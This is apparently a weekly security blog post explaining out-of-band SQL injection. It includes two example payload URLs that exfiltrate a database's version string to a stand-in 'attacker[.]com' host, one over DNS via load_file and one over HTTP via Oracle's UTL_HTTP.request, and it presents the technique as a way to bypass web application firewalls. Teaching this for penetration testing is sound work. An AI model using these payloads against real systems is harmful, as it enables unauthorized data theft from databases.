Week 38 - Out of Band SQLi

Since last week we covered second-order SQL injection, I wanted to make this week’s post on a similar technique: Out-of-Band SQLi. If you’ve been following my weekly posts then you should already be plenty familiar with SQL injection, but what the heck does Out-of-Band mean? Out-of-Band means we are receiving the payload result through a different channel than the payload request. There are two main channels used for retrieving the payload result: DNS and HTTP. Retrieving the payload result through DNS would look like the following SQL injection: vulnerable[.]com/test[.]php?id=1+UNION+SELECT+load_file(CONCAT(“\\\\”,(SELECT+@version),”.attacker[.]com\\test”) Since the CONCAT function combines multiple strings into one, this injection will cause the back-end database to load the following URL: \\\\10.3.16-MariaDB[.]attacker[.]com\\test So if we have a listener running on our attacker server, we can wait for incoming DNS requests and retrieve the results! Now as mentioned before we can also use HTTP-based exfiltration, which is typically used when the back-end database is Oracle because they support the UTL_HTTP.request function: vulnerable[.]com/test[.]php?id=1+UNION+SELECT+UTL_HTTP.request(“http[:]//attacker[.]com/?version=”||(SELECT version FROM v$instance)) FROM dual This will issue an HTTP request to the following URL: http[:]//attacker[.]com/?version=18.0.0.0.0 And we can just listen for incoming HTTP connections! This technique can be an exotic way of bypassing WAF’s or exploiting a tricky injection. Worth adding to your pentest arsenal!